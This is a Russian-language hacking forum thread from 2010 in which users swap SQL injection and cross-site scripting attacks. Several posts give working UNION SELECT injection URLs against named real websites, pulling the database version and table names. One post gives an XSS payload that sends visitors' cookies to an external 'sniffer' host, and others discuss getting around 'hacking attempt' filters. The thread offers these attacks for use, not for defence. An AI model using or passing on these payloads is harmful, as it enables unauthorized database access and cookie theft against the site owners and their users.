12.07.2010, 05:06
|
|
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
С нами:
9667882
Репутация:
170
|
|
тупой вопрос, раньше их пропускал, а ща задумался.
Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
|
|
|
12.07.2010, 05:11
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от zlo12
тупой вопрос, раньше их пропускал, а ща задумался.
Есть ли смысл продолжать искать скули, если вылезает страница с надписью "hacking attempt" либо подобные редиректы?
смотря какой фильтр, все зависит от кода
|
|
|
|
12.07.2010, 06:15
|
|
Новичок
Регистрация: 10.07.2010
Сообщений: 8
С нами:
8337206
Репутация:
0
|
|
http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(version() ),0x71),0x71),4,5--+
->5.0.91-community
http://www.jain4jain.com/profile_viewed_details.php?user_id=9843' union select 1,2,AES_DECRYPT(AES_ENCRYPT(group_concat(table_nam e),0x71),0x71),4,5 %20from%20information_schema.tables%20where%20tabl e_schema='jain4_jain4jain' limit 1,1--+
Не обуви стол?
|
|
|
|
12.07.2010, 06:41
|
|
Постоянный
Регистрация: 28.12.2007
Сообщений: 328
С нами:
9667882
Репутация:
170
|
|
что тут можно сделать? 9 алертов вылезает.
http://www.unsigned.com/scriptalertscript
|
|
|
|
12.07.2010, 10:26
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
Сообщение от R0nin
Вот например:
Код:
http://*.ru/archive.php?year=img=new+Image();img.src="http://*.ru/sniffer/s.gif?"%2bdocument.cookie;"
Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло
Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.
|
|
|
|
12.07.2010, 11:51
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
С нами:
10753628
Репутация:
1
|
|
Dare
/showpost.php?p=2243791&postcount=14265
Попробовал
Код:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+from+information_schema.columns+where+0x636F6C756D6E5F6E616D653D75736572--+
Все тот же результат. Не знаю уже, что и думать. Может какие-то обращения к некоторым таблицам из INFORMATION_SCHEMA как-то фильтруются?
|
|
|
|
12.07.2010, 12:11
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
С нами:
8444531
Репутация:
53
|
|
Сообщение от Decoy
Dare
/showpost.php?p=2243791&postcount=14265
Попробовал
Код:
http://example.com/detail.php?id=-1+UNION+SELECT+1,GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NAME)+SEPARATOR+0x3C62723E),3,4,5+from+information_schema.columns+where+0x636F6C756D6E5F6E616D653D75736572--+
Все тот же результат. Не знаю уже, что и думать. Может какие-то обращения к некоторым таблицам из INFORMATION_SCHEMA как-то фильтруются?
Мб что просто нет к ней доступа (прав не хватает), но ты же грил что некоторые таблицы читал?
Без линка увы ни чем помочь не смогу, если что стучи в асю или ПМ
Последний пост на эту тему!
|
|
|
|
12.07.2010, 12:32
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
С нами:
10753628
Репутация:
1
|
|
Dare
Ссылка выше.
Я думаю, если проблема в правах доступа, то сайт выдал бы ошибку (из-за нехватки аргументов), как если сделать select 1,2,3,4 вместо select 1,2,3,4,5.
PS Постучал по ICQ.
|
|
|
|
12.07.2010, 14:37
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Boa
Залогинился, поставил галочку на "запомнить", потои прошел по такой урле, но все равно на сниффер ничего не пришло
Попробовал вторым способом, где ссылка на жаваскрипт, но все равно не получилось.
Надеюсь там есть уязвимость XSS-injection ?
Если что открой страницу кода и посмотри как он там передался.
|
|
|
|
12.07.2010, 18:59
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 13
С нами:
8399502
Репутация:
0
|
|
почему это не показывают, введенный номер?
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6+--+
http://www.hno-praxis-seevetal.de/index.php?id=9842 and 1=0 union select 1,2,3,4,5,6 limit 0,1+--+
|
|
|
|
|
 |
|
|
Здесь присутствуют: 8 (пользователей: 0 , гостей: 8)
|
|
|
|
Похожие темы
Комбинированный вид
